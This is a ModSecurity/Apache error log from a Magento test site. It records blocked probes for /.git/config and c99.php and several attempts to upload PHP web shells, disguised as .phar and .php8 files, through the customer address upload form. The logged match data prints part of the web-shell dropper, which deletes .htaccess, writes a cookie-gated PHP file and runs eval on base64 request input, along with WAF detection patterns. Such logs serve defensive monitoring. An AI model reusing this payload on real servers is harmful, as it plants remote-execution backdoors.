[Tue Jan 27 03:40:35.039597 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglo-yoYoxcYRb6neA8NQAAAAY"]
[Tue Jan 27 03:40:35.039739 2026] [:error] [pid 1683443] [client 195.178.110.132:39648] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXglo-yoYoxcYRb6neA8NQAAAAY"]
[Tue Jan 27 03:49:21.467787 2026] [php:error] [pid 1683152] [client 74.225.153.249:10345] script '/var/www/magento.test.indacotrentino.com/www/pub/images/c99.php' not found or unable to stat
[Wed Jan 28 04:32:35.778112 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Rule 7fb4de860be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.phar"] [unique_id "aXmDU4DFJuUG1g7B-JGFcQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:35.778629 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.phar"] [unique_id "aXmDU4DFJuUG1g7B-JGFcQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:35.781101 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.phar"] [unique_id "aXmDU4DFJuUG1g7B-JGFcQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:35.781321 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.phar"] [unique_id "aXmDU4DFJuUG1g7B-JGFcQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:36.090532 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: uh88364f428d25.php8 found within FILES:custom_attributes[country_id]: uh88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXmDVIDFJuUG1g7B-JGFcgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/h/uh88364f428d25.phar
[Wed Jan 28 04:32:36.091201 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXmDVIDFJuUG1g7B-JGFcgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/h/uh88364f428d25.phar
[Wed Jan 28 04:32:36.091389 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXmDVIDFJuUG1g7B-JGFcgAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/u/h/uh88364f428d25.phar
[Wed Jan 28 04:32:36.398328 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Rule 7fb4de860be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.php8"] [unique_id "aXmDVIDFJuUG1g7B-JGFcwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:36.398936 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.php8"] [unique_id "aXmDVIDFJuUG1g7B-JGFcwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:36.401244 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.php8"] [unique_id "aXmDVIDFJuUG1g7B-JGFcwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 04:32:36.401416 2026] [:error] [pid 1704962] [client 46.149.66.101:48774] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/h/uh88364f428d25.php8"] [unique_id "aXmDVIDFJuUG1g7B-JGFcwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:20.851499 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Rule 7fb4de860be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.phar"] [unique_id "aXpwOAyOWe2rwsIUxMyV2QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:20.851965 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.phar"] [unique_id "aXpwOAyOWe2rwsIUxMyV2QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:20.854388 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.phar"] [unique_id "aXpwOAyOWe2rwsIUxMyV2QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:20.854574 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.phar"] [unique_id "aXpwOAyOWe2rwsIUxMyV2QAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:21.055000 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 0688364f428d25.php8 found within FILES:custom_attributes[country_id]: 0688364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXpwOQyOWe2rwsIUxMyV2gAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/6/0688364f428d25.phar
[Wed Jan 28 21:23:21.055694 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXpwOQyOWe2rwsIUxMyV2gAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/6/0688364f428d25.phar
[Wed Jan 28 21:23:21.055869 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXpwOQyOWe2rwsIUxMyV2gAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/6/0688364f428d25.phar
[Wed Jan 28 21:23:21.418244 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Rule 7fb4de860be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.php8"] [unique_id "aXpwOQyOWe2rwsIUxMyV2wAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:21.418718 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.php8"] [unique_id "aXpwOQyOWe2rwsIUxMyV2wAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:21.421001 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.php8"] [unique_id "aXpwOQyOWe2rwsIUxMyV2wAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 28 21:23:21.421179 2026] [:error] [pid 1704965] [client 185.65.202.110:50066] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/6/0688364f428d25.php8"] [unique_id "aXpwOQyOWe2rwsIUxMyV2wAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:01.110257 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Rule 7f7f37583be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.phar"] [unique_id "aX16RbTUhfM03Xg_r8UCRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:01.112351 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.phar"] [unique_id "aX16RbTUhfM03Xg_r8UCRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:01.114772 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.phar"] [unique_id "aX16RbTUhfM03Xg_r8UCRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:01.114946 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.phar"] [unique_id "aX16RbTUhfM03Xg_r8UCRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:01.202801 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ka88364f428d25.php8 found within FILES:custom_attributes[country_id]: ka88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX16RbTUhfM03Xg_r8UCSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/a/ka88364f428d25.phar
[Sat Jan 31 04:43:01.203454 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX16RbTUhfM03Xg_r8UCSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/a/ka88364f428d25.phar
[Sat Jan 31 04:43:01.203624 2026] [:error] [pid 1768845] [client 185.65.202.110:50982] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX16RbTUhfM03Xg_r8UCSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/k/a/ka88364f428d25.phar
[Sat Jan 31 04:43:06.229886 2026] [:error] [pid 1768847] [client 185.65.202.110:50990] [client 185.65.202.110] ModSecurity: Rule 7f7f37583be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.php8"] [unique_id "aX16SoXNGdrgkSFwkDV10wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
